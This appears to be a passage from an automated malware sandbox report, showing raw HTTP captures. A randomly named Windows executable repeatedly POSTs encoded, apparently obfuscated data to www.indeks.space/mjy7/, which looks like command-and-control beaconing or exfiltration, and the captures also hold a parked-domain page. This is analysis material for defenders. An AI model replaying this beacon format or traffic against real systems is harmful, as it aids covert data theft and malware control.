                                        Host: www.glitterinthegrey.shop
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:42:15.821510077 CEST1236INHTTP/1.1 200 OK
                                        Server: hcdn
                                        Date: Tue, 27 Aug 2024 06:42:15 GMT
                                        Content-Type: text/html
                                        Content-Length: 10072
                                        Connection: close
                                        Vary: Accept-Encoding
                                        alt-svc: h3=":443"; ma=86400
                                        x-hcdn-request-id: bfd5082ff85feb65d47ae3ab130c0d02-bos-edge1
                                        Expires: Tue, 27 Aug 2024 06:42:14 GMT
                                        Cache-Control: no-cache
                                        Accept-Ranges: bytes
                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                        Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                        Aug 27, 2024 08:42:15.821618080 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                        Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                        Aug 27, 2024 08:42:15.821630001 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                        Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                        Aug 27, 2024 08:42:15.821647882 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                        Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                        Aug 27, 2024 08:42:15.821660042 CEST1236INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                        Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                        Aug 27, 2024 08:42:15.821671009 CEST1120INData Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                        Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                                        Aug 27, 2024 08:42:15.821676970 CEST1236INData Raw: 76 65 72 73 2d 61 74 2d 68 6f 73 74 69 6e 67 65 72 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 43 68 61 6e 67 65 20 6e 61 6d 65 73 65 72 76 65 72 73 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76
                                        Data Ascii: vers-at-hostinger rel=nofollow>Change nameservers</a></div></div></div></div></div><script>var punycode=new function(){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCod
                                        Aug 27, 2024 08:42:15.821682930 CEST1236INData Raw: 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 69 66 28 76 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 64 2b 2b 29 2c 6f 3c 3d 28 73 3d 76 2d 34 38 3c 31 30 3f 76 2d 32 32 3a 76 2d 36 35 3c 32 36 3f 76 2d 36
                                        Data Ascii: ror("punycode_bad_input(1)");if(v=e.charCodeAt(d++),o<=(s=v-48<10?v-22:v-65<26?v-65:v-97<26?v-97:o))throw RangeError("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-
                                        Aug 27, 2024 08:42:15.821687937 CEST640INData Raw: 29 29 3b 67 2b 3d 6f 29 79 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 28 73 2b 28 70 2d 73 29 25 28 6f 2d 73 29 2c 30 29 29 29 2c 70 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 70 2d 73 29 2f 28 6f 2d 73 29 29 3b
                                        Data Ascii: ));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.le


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.651199194.58.112.174805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:42:20.942675114 CEST831OUTPOST /mjy7/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.indeks.space
                                        Origin: http://www.indeks.space
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.indeks.space/mjy7/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 52 69 56 64 64 77 45 36 6d 43 4f 7a 54 78 46 65 6c 46 30 65 34 48 47 4e 65 62 2b 43 67 63 68 64 42 55 4a 68 4b 30 78 35 33 32 71 61 61 38 43 6f 47 47 49 74 31 41 79 37 78 69 6c 65 39 78 71 6b 6c 74 5a 43 50 77 77 38 2f 6a 4d 42 53 37 6b 6f 46 45 4a 75 59 72 2b 56 72 75 41 6b 53 31 62 74 56 76 65 41 63 39 37 78 5a 6e 45 72 69 43 50 2f 7a 31 2f 4d 2b 70 53 6a 39 54 68 54 68 6e 36 50 48 51 78 67 56 41 44 45 65 69 6a 4a 33 64 56 58 37 37 72 2b 69 71 69 65 6b 4b 79 46 72 35 4a 4c 6f 41 55 38 43 41 7a 30 32 59 6b 6d 71 41 65 57 6d 33 54 4a 65 74 4f 62 41 53 69 48 78 66 32 56 31 72 46 76 53 7a 74 30 67 35 6c 70
                                        Data Ascii: mvjDMBx8=RiVddwE6mCOzTxFelF0e4HGNeb+CgchdBUJhK0x532qaa8CoGGIt1Ay7xile9xqkltZCPww8/jMBS7koFEJuYr+VruAkS1btVveAc97xZnEriCP/z1/M+pSj9ThThn6PHQxgVADEeijJ3dVX77r+iqiekKyFr5JLoAU8CAz02YkmqAeWm3TJetObASiHxf2V1rFvSzt0g5lp
                                        Aug 27, 2024 08:42:21.627861977 CEST1236INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 27 Aug 2024 06:42:21 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 [TRUNCATED]
                                        Data Ascii: e2fZmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktf8[:^_mh#%%F.(fQvbIKZoH{&.YFMX.[?fqyv^zcVJIy4JHPad%WAPvT,<6,F#mSQd4V~gma+|\|j-"RAqnj4T={\DL$x7 ;TJ}mj3h,8[J~xA!hv3y?YdnabJpAS[^#9603t~D31Js8(`6Ul?a>g)u-="3]cJH?fiEZ@lTy\wi{60Pv:0Q%Y#Nh=eK$o(U#@eg.k9KAl:d$:+A&Xt^#N|%$7E|?C`uXTTJX3R<Z5.$?NN&eoRH.j;W2l?EUM| [TRUNCATED]
                                        Aug 27, 2024 08:42:21.627893925 CEST1236INData Raw: b6 4f 67 9d 98 bf 40 aa ae 31 80 1f 3b 5e cb 55 1b 91 a1 7d 1a 13 46 81 ef 75 9f 6e 14 30 30 e0 6e 53 00 fb 17 d0 8b 68 05 f5 3e 8e ef 01 67 3c c2 14 bf ce 3a ae 56 4e 38 6a 6b 93 e7 92 b4 7d 30 dd 00 f1 d1 53 18 f7 cf 88 7a f7 93 2f e1 22 8f 93
                                        Data Ascii: Og@1;^U}Fun00nSh>g<:VN8jk}0Sz/"DNwuxLjjP2J'zev$/PB[$Pzi(wA#`a1%wtZD7(.kLYyZdB&-@
                                        Aug 27, 2024 08:42:21.627907038 CEST1236INData Raw: 44 a6 fb 4f 22 4c e6 39 d0 95 8e c0 22 4f 41 53 70 71 c2 bd 18 8a d9 ee 9b 53 57 10 1e 05 74 4a 01 8a c9 2b 92 65 4e 08 38 1b 2e 1c 4a a0 39 52 61 f0 f8 23 70 e7 a7 1c e8 b1 9b 65 98 43 9e a3 22 fe 86 bb 01 ce 3a cb 00 6d d7 b0 43 ce b7 d0 94 3a
                                        Data Ascii: DO"L9"OASpqSWtJ+eN8.J9Ra#peC":mC:|bmr_.@>2=8@"9?ce#`O l:#48Kt>c8,`OKWpy62^="?*7(F>P8wV:_?2
                                        Aug 27, 2024 08:42:21.627919912 CEST109INData Raw: 42 b6 2a d4 e2 58 61 d3 09 fd 80 8b 78 dc eb 45 23 7b 7e 16 be 38 7f 76 06 5d fd 2a 6d ee 4a b6 28 84 59 99 bc 78 bf 46 47 d7 78 d0 e7 c3 b1 f0 52 e7 ac 6c 87 be 3b 8a d4 8a a0 0b 90 b3 c6 19 fc 0c af ac 94 84 74 f1 c4 89 1c 41 27 e9 93 49 09 63
                                        Data Ascii: B*XaxE#{~8v]*mJ(YxFGxRl;tA'Ic (5=)0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.651201194.58.112.174805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:42:23.486563921 CEST855OUTPOST /mjy7/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.indeks.space
                                        Origin: http://www.indeks.space
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.indeks.space/mjy7/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 52 69 56 64 64 77 45 36 6d 43 4f 7a 52 52 56 65 6b 6d 4d 65 2b 6e 47 4f 64 62 2b 43 70 38 68 5a 42 55 4e 68 4b 32 63 68 33 46 4f 61 61 5a 2b 6f 48 44 38 74 79 41 79 37 70 53 6b 55 7a 52 71 72 6c 74 56 77 50 78 4d 38 2f 6a 59 42 53 2f 73 6f 45 33 52 68 59 37 2b 62 6b 4f 41 6d 66 56 62 74 56 76 65 41 63 35 61 55 5a 6b 30 72 69 78 58 2f 79 55 2f 54 69 5a 53 67 31 7a 68 54 77 33 37 47 48 51 78 57 56 42 66 2b 65 68 62 4a 33 5a 5a 58 34 71 72 78 73 71 69 55 67 4b 79 58 6f 4a 6f 6d 69 47 63 36 64 6a 48 4b 71 65 49 48 69 57 66 4d 36 45 54 71 4d 39 75 5a 41 51 36 31 78 2f 32 2f 33 72 39 76 41 6b 68 54 76 4e 41 4b 42 41 32 61 6a 66 48 44 2f 4f 30 58 66 6c 5a 6a 78 52 56 58 42 51 3d 3d
                                        Data Ascii: mvjDMBx8=RiVddwE6mCOzRRVekmMe+nGOdb+Cp8hZBUNhK2ch3FOaaZ+oHD8tyAy7pSkUzRqrltVwPxM8/jYBS/soE3RhY7+bkOAmfVbtVveAc5aUZk0rixX/yU/TiZSg1zhTw37GHQxWVBf+ehbJ3ZZX4qrxsqiUgKyXoJomiGc6djHKqeIHiWfM6ETqM9uZAQ61x/2/3r9vAkhTvNAKBA2ajfHD/O0XflZjxRVXBQ==
                                        Aug 27, 2024 08:42:24.196062088 CEST1236INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 27 Aug 2024 06:42:24 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 [TRUNCATED]
                                        Data Ascii: e2fZmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktf8[:^_mh#%%F.(fQvbIKZoH{&.YFMX.[?fqyv^zcVJIy4JHPad%WAPvT,<6,F#mSQd4V~gma+|\|j-"RAqnj4T={\DL$x7 ;TJ}mj3h,8[J~xA!hv3y?YdnabJpAS[^#9603t~D31Js8(`6Ul?a>g)u-="3]cJH?fiEZ@lTy\wi{60Pv:0Q%Y#Nh=eK$o(U#@eg.k9KAl:d$:+A&Xt^#N|%$7E|?C`uXTTJX3R<Z5.$?NN&eoRH.j;W2l?EUM| [TRUNCATED]
                                        Aug 27, 2024 08:42:24.196084023 CEST1236INData Raw: b6 4f 67 9d 98 bf 40 aa ae 31 80 1f 3b 5e cb 55 1b 91 a1 7d 1a 13 46 81 ef 75 9f 6e 14 30 30 e0 6e 53 00 fb 17 d0 8b 68 05 f5 3e 8e ef 01 67 3c c2 14 bf ce 3a ae 56 4e 38 6a 6b 93 e7 92 b4 7d 30 dd 00 f1 d1 53 18 f7 cf 88 7a f7 93 2f e1 22 8f 93
                                        Data Ascii: Og@1;^U}Fun00nSh>g<:VN8jk}0Sz/"DNwuxLjjP2J'zev$/PB[$Pzi(wA#`a1%wtZD7(.kLYyZdB&-@
                                        Aug 27, 2024 08:42:24.196098089 CEST1236INData Raw: 44 a6 fb 4f 22 4c e6 39 d0 95 8e c0 22 4f 41 53 70 71 c2 bd 18 8a d9 ee 9b 53 57 10 1e 05 74 4a 01 8a c9 2b 92 65 4e 08 38 1b 2e 1c 4a a0 39 52 61 f0 f8 23 70 e7 a7 1c e8 b1 9b 65 98 43 9e a3 22 fe 86 bb 01 ce 3a cb 00 6d d7 b0 43 ce b7 d0 94 3a
                                        Data Ascii: DO"L9"OASpqSWtJ+eN8.J9Ra#peC":mC:|bmr_.@>2=8@"9?ce#`O l:#48Kt>c8,`OKWpy62^="?*7(F>P8wV:_?2
                                        Aug 27, 2024 08:42:24.196114063 CEST109INData Raw: 42 b6 2a d4 e2 58 61 d3 09 fd 80 8b 78 dc eb 45 23 7b 7e 16 be 38 7f 76 06 5d fd 2a 6d ee 4a b6 28 84 59 99 bc 78 bf 46 47 d7 78 d0 e7 c3 b1 f0 52 e7 ac 6c 87 be 3b 8a d4 8a a0 0b 90 b3 c6 19 fc 0c af ac 94 84 74 f1 c4 89 1c 41 27 e9 93 49 09 63
                                        Data Ascii: B*XaxE#{~8v]*mJ(YxFGxRl;tA'Ic (5=)0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.651202194.58.112.174805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:42:26.033678055 CEST1868OUTPOST /mjy7/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.indeks.space
                                        Origin: http://www.indeks.space
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.indeks.space/mjy7/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 52 69 56 64 64 77 45 36 6d 43 4f 7a 52 52 56 65 6b 6d 4d 65 2b 6e 47 4f 64 62 2b 43 70 38 68 5a 42 55 4e 68 4b 32 63 68 33 46 47 61 62 72 47 6f 47 67 6b 74 7a 41 79 37 33 69 6b 58 7a 52 71 4d 6c 75 6b 37 50 78 42 4c 2f 67 67 42 53 64 30 6f 52 79 6c 68 57 37 2b 62 76 75 41 6a 53 31 61 70 56 76 4f 45 63 39 32 55 5a 6b 30 72 69 77 6e 2f 37 6c 2f 54 67 5a 53 6a 39 54 68 48 68 6e 36 6a 48 51 70 47 56 42 61 42 65 77 37 4a 35 5a 4a 58 33 34 44 78 7a 61 69 53 73 71 7a 45 6f 4a 6b 6c 69 48 31 46 64 6a 44 6b 71 59 30 48 68 67 62 54 6c 33 53 30 57 73 65 62 64 33 61 44 2f 34 4f 4c 35 4e 42 7a 54 6e 52 79 76 74 4a 34 5a 51 75 7a 33 4f 6d 54 79 49 55 38 5a 56 6b 37 6c 69 55 69 62 5a 72 6c 63 32 69 45 61 36 65 54 77 65 58 79 76 4f 54 47 36 42 4f 2f 47 41 4f 37 6f 4a 61 2f 77 6d 71 43 35 4d 76 72 47 72 69 52 34 55 73 72 47 43 6a 39 64 4f 52 70 4e 65 37 79 57 66 4e 32 2f 34 4c 50 2f 70 6c 71 5a 78 72 46 50 64 36 57 50 48 4d 4c 6e 6d 4c 5a 37 79 74 6a 52 63 62 69 38 7a 4b 49 76 6f 45 79 76 [TRUNCATED]
                                        Data Ascii: mvjDMBx8=RiVddwE6mCOzRRVekmMe+nGOdb+Cp8hZBUNhK2ch3FGabrGoGgktzAy73ikXzRqMluk7PxBL/ggBSd0oRylhW7+bvuAjS1apVvOEc92UZk0riwn/7l/TgZSj9ThHhn6jHQpGVBaBew7J5ZJX34DxzaiSsqzEoJkliH1FdjDkqY0HhgbTl3S0Wsebd3aD/4OL5NBzTnRyvtJ4ZQuz3OmTyIU8ZVk7liUibZrlc2iEa6eTweXyvOTG6BO/GAO7oJa/wmqC5MvrGriR4UsrGCj9dORpNe7yWfN2/4LP/plqZxrFPd6WPHMLnmLZ7ytjRcbi8zKIvoEyvzOJZcl+n1NkFkWaY8aerlmL036y08odnOAVzqG/1KCf4qI3LaW5nJsvh6TE8WES5JGplGVyrm0wQ6+UDAaTmvmWcZXzLlk5zT/Chc/eAztwezoolnTP0SLKysEp/U2aym6FUghgO7lzV+6oaR+W3b6uP0grDlueDHksuJmWOI25q7+j9LqZb7wc5sV310bzMBjkS/PWArl2WroFZjKRImuuEQkF1+clppu2mzJjs/rzsdsbpc8ie08kzEO1ycDfyewQmvwAaaSk4kgo4VujVEbdJp0d+q2x+uveDmGWQLGvbdkxGK0A0Qn8ip8OIM/0Bih7oMkBqtVY9Fkuto7seb5NWDfwRxK6tsiBQWbYjths/FMIild6r6daoPG7zb1u+fcw7A+RuygUzxMuI8vO//WDOCdh4t8s7Om0PJSc+TxyTh5LdhR/CzttwgA9uGq7OCyHBfJH10P6bG8Ex0vXDeO5XHIrDa2QbybUTmYtWE2fKF0D9ybc+gf07TtX0EDhwDg9HsM2gFUBMEtv7ucmpKtzQmg6FZueHzAJLn7RQDKnRbE17XHKnCUgcagnfU173Ot43GDW/A0PffWI7mzTeSbueqbo5Fx/C8fkrtWX8+gViLLX44uz/ZbJwnaqi8zZBl1AWTv/tsuICQv34jRm2ndiQhSj357EFuP [TRUNCATED]
                                        Aug 27, 2024 08:42:26.760317087 CEST1236INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 27 Aug 2024 06:42:26 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 